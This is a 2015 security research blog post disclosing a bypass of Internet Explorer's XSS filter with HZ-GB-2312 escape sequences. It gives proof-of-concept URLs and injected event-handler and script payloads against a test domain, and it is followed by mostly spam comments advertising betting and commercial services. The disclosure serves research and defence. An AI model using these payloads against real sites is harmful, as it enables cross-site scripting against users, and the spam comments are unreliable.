Tuesday, September 29, 2015

Bypassing IE's XSS Filter with HZ-GB-2312 escape sequence

I would like to share IE XSS Filter bypass with escape sequence of HZ-GB-2312 encoding.

To use this vector, we need the target page's Content-Type header which charset is not specified in.

Bypass 1

PoC:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonmouseover=alert(1)%3EAAA
No user interaction version:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

"~[0x0A]" is HZ-GB-2312 escape sequence. It seems that XSS filter makes an exception for "~[0x0A]" .

If Content-Type header has proper charset, it does not work:
http://vulnerabledoma.in/char_test?charset=utf-8&body=%3Cx~%0Aonmouseover=alert(1)%3EAAA

On the other hand, if meta tag has proper charset, it still works:
http://vulnerabledoma.in/xssable?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

Bypass 2

"~{" is also HZ-GB-2312 escape sequence. We can use this for bypass. We can call same-origin method in string literal.

PoC is here:
http://l0.cm/xssfilter_hz_poc.html

Please click the "go" button. You can confirm element.click method is called.

"click" is called from the following code:
http://vulnerabledoma.in/xss_js?q=%22%3B~{valueOf:opener.button.click}//
<script>var q="";~{valueOf:opener.button.click}//"</script>

Also, you can use "toString":
http://vulnerabledoma.in/xss_js?q=%22%3B~{toString:opener.button.click}//

<script>var q="";~{toString:opener.button.click}//"</script>

That's all. See you next month!

9 comments:

  1. Wow! This can be one particular of the most useful blogs We have ever arrive across on this subject 먹튀검증

    ReplyDelete
  2. Hey! There you are! Our service https://expertpaperwriter.com/papernow-org-review/ focus on keeping our prices low, but unlike other academic writing services online, we never sacrifice quality for the sake of price. We thrive on service orientation; our mission is to increase customer loyalty by providing nonparallel services and after sales support.

    ReplyDelete
  3. There are several methods for avoiding XSS filters, but the ideal is to employ a best research data collection services that is particularly built to avoid these filters. You may be confident that your study data will be collected without incident if you choose a service like this.

    ReplyDelete
  4. A participant also could play colors, odd 토토사이트 and even numbers, amongst others. A bet on a single number pays 35 to 1, together with the zero and 00. Bets on pink or black, odd and even pay 1 for 1, and even cash. In the 1960s and early Seventies, Richard Jarecki won about $1.2 million at dozens of European casinos. He claimed that he was using a mathematical system designed on a powerful pc. In actuality, he simply noticed greater than 10,000 spins of every roulette wheel to find out} flaws within the wheels.

    ReplyDelete
  5. One of the best things about refurbished gadgets is that they undergo rigorous testing and quality checks, so you can trust that you're getting a reliable product. It's a win-win for your wallet and peace of mind.https://smartimobile.com

    ReplyDelete
  6. By leveraging these strategies, developers can enhance the effectiveness of their web security measures. Stay ahead of potential vulnerabilities, especially in sensitive sectors like the saudi medical cloud, by understanding and mitigating such risks effectively.

    ReplyDelete
  7. Medical credit card processing refers to the system through which healthcare providers accept and manage credit card payments from patients for medical services. This service ensures a seamless transaction process, enhancing convenience for patients and streamlining payment collections for providers. Specialized medical credit card processing solutions often include features like compliance with healthcare regulations (such as HIPAA), secure data handling, and the ability to manage large transaction volumes.

    These systems may also offer financing options, allowing patients to pay in installments, thereby making healthcare more accessible. By adopting these services, medical practices can improve cash flow, reduce billing complexities, and enhance overall patient satisfaction.

    ReplyDelete
  8. Good post! This is a great blog that I'll be sure to visit many more times this year. We appreciate the article connections game

    ReplyDelete
  9. Bypassing IE's XSS filter with the HZ-GB-2312 escape sequence highlights the importance of robust security measures in software environments. For businesses utilizing microsoft 365 consulting services can be invaluable in fortifying their systems against such vulnerabilities. Microsoft 365 consulting provides expert guidance on implementing advanced security protocols

    ReplyDelete